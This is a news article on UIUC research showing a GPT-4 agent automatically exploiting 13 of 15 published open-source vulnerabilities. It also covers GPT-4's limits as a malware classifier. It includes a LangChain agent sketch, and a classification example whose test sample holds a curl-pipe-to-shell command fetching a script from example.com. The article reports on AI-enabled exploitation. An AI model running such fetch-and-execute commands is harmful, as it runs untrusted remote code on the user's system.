May 3, 2024

A recent research study reveals that current AI technology (GPT-4) can allow threat actors to automate exploits for public vulnerabilities within minutes. If that holds, the current wait-and-patch strategy will no longer be effective.

The research findings, from the University of Illinois Urbana-Champaign (UIUC), warn of AI-enabled cyber threats. Threat actors have already used LLMs for phishing and malware in their campaigns. Now, though, with only GPT-4 and an open source framework to package it, they can automate the exploitation of vulnerabilities as soon as they are published.


The team of four UIUC researchers built their test subject around an LLM agent consisting of four components: a prompt, a base LLM, a framework (in this case, ReAct, as implemented in LangChain), and tools such as a terminal and a code interpreter.
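To make that architecture concrete, below is a minimal sketch of how such a four-part agent can be wired together with LangChain's ReAct helpers. The model name, prompt text, and tool selection here are assumptions for illustration, not the researchers' actual setup, and exact LangChain module paths vary by version.

```python
# Minimal sketch of a ReAct-style LLM agent with a terminal and a Python
# interpreter as tools. Illustrative only; not the researchers' actual code.
from langchain.agents import initialize_agent, AgentType
from langchain_community.tools import ShellTool            # terminal tool
from langchain_experimental.tools import PythonREPLTool    # code interpreter
from langchain_openai import ChatOpenAI

# 1. Base LLM
llm = ChatOpenAI(model="gpt-4", temperature=0)

# 2. Tools the agent is allowed to call
tools = [ShellTool(), PythonREPLTool()]

# 3. Framework: a ReAct-style reasoning loop (thought -> action -> observation)
agent = initialize_agent(
    tools,
    llm,
    agent=AgentType.ZERO_SHOT_REACT_DESCRIPTION,
    verbose=True,
)

# 4. Prompt: a hypothetical task description fed to the agent
agent.run("Summarize what the attached security advisory describes.")
```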

The LLM agent was tested against 15 known vulnerabilities (a mix of Critical and High severity) in open source software. Eleven of them were disclosed after GPT-4's training cutoff, meaning this was the first time the model had been exposed to them.

Given the details of the security advisories, the AI agent was tasked with exploiting each bug in turn. The results painted a stark picture: of the 10 models evaluated, only GPT-4 succeeded, exploiting 13 of the 15 vulnerabilities, or 87% of the total.


It failed only twice: CVE-2024-25640 survived unscathed because of a quirk in navigating the Iris web application that the model couldn't handle, while the researchers speculated that GPT-4 missed the CVE-2023-51653 bug in the Hertzbeat monitoring tool because its detailed description is published in Chinese, which may have confused the English-prompted agent.

On a larger scale, if threat actors start using LLM agents to automatically exploit public vulnerabilities, companies will no longer be able to sit back and wait to patch new bugs. They may have to start using the same LLM technologies their adversaries do.

Despite these alarming results, GPT-4 still has some way to go before it is a reliable security assistant for identifying open source software samples as malicious or benign and assigning them risk scores. GPT-4 outperformed all other models at explaining source code and providing assessments of legible code, but all models produced a number of false positives and false negatives.
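As an illustration of that assistant use case, the snippet below sketches how a code sample might be sent to GPT-4 for a malicious/benign verdict and a risk score via the OpenAI Python client. The prompt wording, the 0-10 risk scale, and the example sample are assumptions made for this sketch, not the researchers' methodology, and any verdict returned should feed into a manual review rather than replace one.

```python
# Hypothetical sketch: asking GPT-4 to classify a code sample and assign a
# risk score. Illustrative only; the prompt and 0-10 scale are assumptions.
from openai import OpenAI

client = OpenAI()  # reads OPENAI_API_KEY from the environment

sample = '''
import os
os.system("curl http://example.com/install.sh | sh")
'''

response = client.chat.completions.create(
    model="gpt-4",
    messages=[
        {
            "role": "system",
            "content": (
                "You are a security reviewer. Label the code sample as "
                "MALICIOUS or BENIGN, give a risk score from 0 (harmless) "
                "to 10 (critical), and explain your reasoning in one sentence."
            ),
        },
        {"role": "user", "content": sample},
    ],
)

# The verdict is one signal among many; a human reviewer makes the final call.
print(response.choices[0].message.content)
```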


Automated LLM-based assessment is still not mature and should not replace manual reviews, but it can certainly serve as one additional signal and input for those reviews.
